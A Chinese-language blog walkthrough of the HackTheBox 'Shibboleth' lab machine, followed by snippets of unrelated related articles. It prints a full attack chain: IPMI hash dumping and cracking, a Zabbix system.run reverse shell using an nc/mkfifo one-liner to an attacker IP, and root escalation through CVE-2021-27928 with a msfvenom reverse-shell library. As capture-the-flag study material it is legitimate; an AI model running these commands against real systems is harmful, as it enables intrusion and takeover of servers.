废物的靶场日记 hackthebox-Shibboleth

2023-11-05 15:40

本文主要是介绍废物的靶场日记 hackthebox-Shibboleth,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

废物的靶场日记 hackthebox-Shibboleth

今天做个medium难度的 以惩戒中午嗯造炸鸡奶茶的罪行!
明天继续开混easy 摆烂还是要摆烂的
靶场是Shibboleth 靶机IP 10.10.11.124

前渗透

老样子 信息收集 nmap -sV -A 10.10.11.124 只有一个80端口
访问发现得先绑一下hosts vi /etc/hosts 10.10.11.124 shibboleth.htb
但是访问发现这个网页好像是不完整的 而且没什么入口 于是dirsearch wfuzz两头开花扫扫
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u shibboleth.htb -H “Host:FUZZ.shibboleth.htb” --hw 26 开扫子域名

000000099: 200 29 L 219 W 3684 Ch “monitor”
000000346: 200 29 L 219 W 3684 Ch “monitoring”
000000390: 200 29 L 219 W 3684 Ch “zabbix”

出来三个子域名 dirsearch没啥东西 结果访问这三个子域名都是一样的后台登录地址 登录是post方式 懒狗必然是直接sqlmap -r a.txt跑一跑

跑了半天啥也没有 于是找了几个可能的词生成字典想试试爆破
但是这新装的kali上自带的burp限制爆破速度 仔细想想也不太可能是爆破
遂直接放弃 回头得更新一下工具
做到现在进度已经很明显了 基本上是啥都没做出来 麻了 但没有完全麻 局麻

回顾一下 比较有可能的就是有我没扫出来的端口了 一开始我以为是扫全端口结果还是没扫出来最后发现是扫UDP端口
sudo nmap -sU --min-rate 1000 10.10.11.124

623/udp open asf-rmcp
1068/udp closed instl_bootc

看到这么两个端口 好消息是这个623端口开着多半有花头 坏消息是它寄吧谁
直接msf里search一哈 search不到 那么就来到了我们的google英语阅读环节
发现623归属的IPMI 在2.0版本是有漏洞的 msf里search了一下有

auxiliary/scanner/ipmi/ipmi_version
跑一下 果然是2.0 这入口你挺能藏啊
之后 auxiliary(scanner/ipmi/ipmi_dumphashes) 得到

[+] 10.10.11.124:623 - IPMI - Hash found:
Administrator:d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450eca7da8a29de783e9a

然后就是hashcat跑了 这里hash modes是7300
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols

hashcat -m 7300 d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce
69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450e
ca7da8a29de783e9a -a 0 rockyou.txt 开冲!

果不其然又到了每日一寄环节 新kali只设置了2g内存 冲不动 关掉kali重新设置8G内存再重新启动重连上来
得到密码 ilovepumkinpie1 南瓜饼确实能处!

登陆后台 没找到文件上传之类的东西 但是5.0.17版本的zabbix直接有exp https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
看了exp复现发现这是个锤子exp 后台原来直接就有官方rce

http://monitor.shibboleth.htb/items.php?form=create&hostid=10084
key选项可以直接select system.run 那就经典nc -lvnp 7888
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 7888 >/tmp/f,nowait]
弹回shell 前渗透结束

后渗透

进去了但是发现连cat user.txt都不够权限 纯废物权限啥都干不了
/etc/passwd 发现只有个ipmi-svc❌1000:1000:ipmi-svc,:/home/ipmi-svc:/bin/bash
密码就是后台密码 拿下user的flag f088a31c961388f860d617119d7b47b8

继续提权 看了一下端口有3306 mysql -V
mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
searchsploit小手一搜 版本不够 google小手一搜 CVE-2021-27928
可以在修改wsrep_provider和wsrep_notify_cmd后提权执行命令

不过这个cve提权需要mysql的密码 /etc/下面的.conf里有
zabbix bloooarskybluh

然后就是毫无含金量的cve模仿秀!
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f elf-so -o a.so
nc -lvp 4444
mysql -u zabbix -p -e ‘SET GLOBAL wsrep_provider="/tmp/a.so";’
4444的nc弹回来拿到root权限 找到另外一个root的flag c71237b166b874d49ade0926b21e6b6d 打完

打完之后rank也光荣的从noob进化成了Script Kiddie 可以说是对我这个废物完美的总结了

请添加图片描述

这篇关于废物的靶场日记 hackthebox-Shibboleth的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/350821

相关文章

【网络安全的神秘世界】搭建dvwa靶场

🌝博客主页:泥菩萨 💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具 下载DVWA https://github.com/digininja/DVWA/blob/master/README.zh.md 安装DVWA 安装phpstudy https://editor.csdn.net/md/?articleId=1399043

Pikachu靶场--CRSF

借鉴参考 CSRF跨站请求伪造(CTF教程,Web安全渗透入门)_bilibili pikachu靶场CSRF之TOKEN绕过_csrf token绕过的原理-CSDN博客 CSRF(get) 发现需要登录 查看提示,获取username和password  选择一个用户进行登录 选择修改个人信息  修改信息的过程中利用BP抓包  抓包成功-->相关工具--

2024.06.23 刷题日记

〇、前言 今天重点刷了回溯,以及常见的题目。 46. 全排列 给定一个不含重复数字的数组 nums ,返回其 所有可能的全排列 。你可以 按任意顺序 返回答案。 示例 1: 输入:nums = [1,2,3] 输出:[[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]] 示例 2: 输入:nums = [0,1] 输出:[[0,1]

2024.06.22 刷题日记

199. 二叉树的右视图 这道题目的思路就是层次遍历,然后每次处理每一层所有的元素,如果是第一个就收集到答案中: class Solution {public:vector<int> rightSideView(TreeNode* root) {if (!root)return {};queue<TreeNode*> que;vector<int> ans;que.push(root);Tr

HackTheBox-Linux基础

Linux 结构 历史       许多事件导致了第一个 Linux 内核的创建,并最终创建了 Linux 操作系统 (OS),从 1970 年 Ken Thompson 和 Dennis Ritchie(当时都在 AT&T 工作)发布 Unix 操作系统开始。伯克利软件发行版 (BSD) 于 1977 年发布,但由于它包含 AT&T 拥有的 Unix 代码,因此由此产生的诉讼限制了 BS

shardingsphere调优日记

文章目录 一、总括二、连接数调优二、CPU线程的利用率三、服务器内存的利用率 一、总括 调优的几个方面 连接数调优,包含shardingsphere和mysql的连接数。shardingsphere的globle.yaml中线程调优。(充分利用CPU)shardingsphere中的内存调优。(充分利用内存) 二、连接数调优 注意调整maxPoolSize,minPoolS

2024.06.21 刷题日记

101. 对称二叉树 判断是否对称,检查 root->left->val == root->right->val,接着进行递归检查对称位置: class Solution {public:// 传入对称位置的两个对称位置bool isMirror(TreeNode* left, TreeNode* right) {if (!left && !right)return true;if (!le

【日记】梦到兄长要给鳄鱼换牙齿……(421 字)

正文   今天中午睡了一个小时多一点,做了一个很奇怪的梦。梦见兄长要给一条鳄鱼换牙齿,还说早上不好操作,要三天之后的中午或晚上,颇有一种翻黄历寻个良辰吉日之感。但我没那样大的耐性,便捏住鳄鱼的嘴,左摔右摔给它摔晕了,叫哥哥来换。兄长说摔晕了没意思,后面记不清了。只记得最后我们从这鳄鱼身上削了一块肉下来,围在一篝火旁烤了吃罢。   醒来觉得这梦过于离奇,反正最后都要削了肉吃,换牙齿有什么意义呢?

Vue3学习日记(day5)

接下来我们继续探讨文档 event对象 在Vue.js中,$event变量或箭头函数中的event参数用于捕获原始的DOM事件对象。这个对象包含了所有与特定事件相关的信息,比如鼠标点击的位置、键盘按键的键码、触摸事件的触摸点等。 当你在事件处理器中需要做一些基于事件本身的处理时,如阻止默认行为(event.preventDefault())、停止事件传播(event.stopPropag

xss.haozi.me靶场通关参考

url:https://xss.haozi.me/ 文章目录 0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C00xD00xE00xF0x100x110x12 0x00 先看js代码,第一关给你热热手,没给你加过 payload: <script>alert(1)</script> 0x01 这关给你限制了把